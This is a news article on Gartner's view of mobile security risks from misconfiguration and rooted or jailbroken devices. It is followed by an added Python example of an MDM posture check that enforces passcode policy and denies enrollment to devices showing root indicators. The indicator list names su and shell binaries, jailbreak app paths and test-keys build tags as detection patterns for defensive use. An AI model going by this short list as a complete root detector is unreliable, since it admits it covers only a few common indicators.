“Mobile security breaches are — and will continue to be — the result of misconfiguration and misuse on an app level, rather than the outcome of deeply technical attacks on mobile devices,” said Dionisio Zumerle, principal research analyst at Gartner, in a statement. “A classic example of misconfiguration is the misuse of personal cloud services through apps residing on smartphones and tablets. When used to convey enterprise data, these apps lead to data leaks that the organization remains unaware of for the majority of devices.”

Doing significant damage in the world of mobile devices requires that malware be launched on devices that have been altered at the administrative level, Zumerle argued. While jailbreaking or rooting phones allows users to access device resources that are not normally accessible, they also put data in danger because they remove app-specific protections as well as the safe ‘sandbox’ provided by the operating system, he said, adding that they can also allow malware to be downloaded to the device and enable malicious actions.

“The most obvious platform compromises of this nature are ‘jailbreaking’ on iOS or ‘rooting’ on Android devices. They escalate the user’s privileges on the device, effectively turning a user into an administrator,” he said.

Gartner recommends organizations protect mobile devices using a mobile device management policy as well as app shielding and containers that protect important data. In addition, passcodes should be used alongside timeout standards and a limited number of retries. Jailbreaking or rooting devices should not be allowed.

“We also recommend that they favor mobile app reputation services and establish external malware control on content before it is delivered to the mobile device,” Zumerle said.
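What the recommendations above amount to on the MDM side is a posture check run at enrollment and on every check-in: passcode length, screen timeout, retry limit, and a refusal to enroll a rooted or jailbroken device at all, since the container and app-shielding controls Gartner mentions assume an intact OS sandbox. The following is an added example written for this page, not Gartner's or any MDM vendor's code. The policy values are illustrative assumptions, the posture records are constructed, and the root/jailbreak indicators are a few commonly cited paths and build tags rather than a complete detector; a real agent would also have to attest these values instead of trusting a self-reported record.

```python
"""MDM-style device posture check against a mobile policy (added example)."""
from dataclasses import dataclass

# Assumed policy for illustration (not Gartner's numbers).
POLICY = {
    "min_passcode_length": 6,
    "max_screen_timeout_s": 300,   # lock after at most 5 minutes idle
    "max_passcode_retries": 10,    # wipe or lock after this many failures
    "allow_rooted": False,
}

# A few commonly cited indicators; a real agent checks many more and attests them.
ROOT_INDICATORS = {
    "android": frozenset({"/system/bin/su", "/system/xbin/su", "/sbin/su"}),
    "ios": frozenset({"/Applications/Cydia.app", "/bin/bash", "/usr/sbin/sshd"}),
}
ROOTED_BUILD_TAGS = frozenset({"test-keys"})   # Android builds signed with AOSP test keys


@dataclass(frozen=True)
class DevicePosture:
    platform: str              # "android" or "ios"
    passcode_length: int       # 0 means no passcode set
    screen_timeout_s: int      # 0 means never locks
    passcode_retries: int      # 0 means unlimited attempts (constructed convention)
    existing_paths: frozenset  # filesystem paths the agent found present
    build_tags: str = ""       # Android ro.build.tags, empty on iOS


# Constructed sample devices.
COMPLIANT = DevicePosture("android", 6, 120, 5, frozenset({"/system/bin/sh"}), "release-keys")
ROOTED = DevicePosture("android", 8, 60, 5, frozenset({"/system/xbin/su"}), "test-keys")
WEAK = DevicePosture("ios", 4, 900, 0, frozenset())


def root_indicators(p):
    """Indicators of rooting/jailbreaking present on the device, sorted."""
    found = sorted(p.existing_paths & ROOT_INDICATORS.get(p.platform, frozenset()))
    if p.platform == "android" and p.build_tags in ROOTED_BUILD_TAGS:
        found.append("build_tags=" + p.build_tags)
    return found


def evaluate(p, policy=POLICY):
    """Return a list of policy findings; an empty list means compliant."""
    findings = []
    if p.passcode_length < policy["min_passcode_length"]:
        findings.append(f"passcode too short ({p.passcode_length} < {policy['min_passcode_length']})")
    if p.screen_timeout_s == 0 or p.screen_timeout_s > policy["max_screen_timeout_s"]:
        findings.append(f"screen timeout {p.screen_timeout_s}s exceeds {policy['max_screen_timeout_s']}s")
    if p.passcode_retries == 0 or p.passcode_retries > policy["max_passcode_retries"]:
        findings.append(f"passcode retries {p.passcode_retries or 'unlimited'} exceed {policy['max_passcode_retries']}")
    indicators = root_indicators(p)
    if indicators and not policy["allow_rooted"]:
        findings.append("rooted/jailbroken: " + ", ".join(indicators))
    return findings


def enrollment_action(findings):
    """Rooted devices are refused outright: containers and app shielding cannot
    be trusted once the OS sandbox is gone. Other findings quarantine the
    device until the user fixes the setting."""
    if any(f.startswith("rooted/jailbroken") for f in findings):
        return "deny"
    return "quarantine" if findings else "enroll"


if __name__ == "__main__":
    for name, device in (("compliant", COMPLIANT), ("rooted", ROOTED), ("weak", WEAK)):
        findings = evaluate(device)
        print(f"{name:10} -> {enrollment_action(findings)}")
        for f in findings:
            print("    ", f)
```

Note that the rooted device here would pass every other control, which is the reason the root check is evaluated separately and overrides the outcome instead of being one more finding among several.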

 

Brian Prince is a Contributing Writer for SecurityWeek.

Previous Columns by Brian Prince:

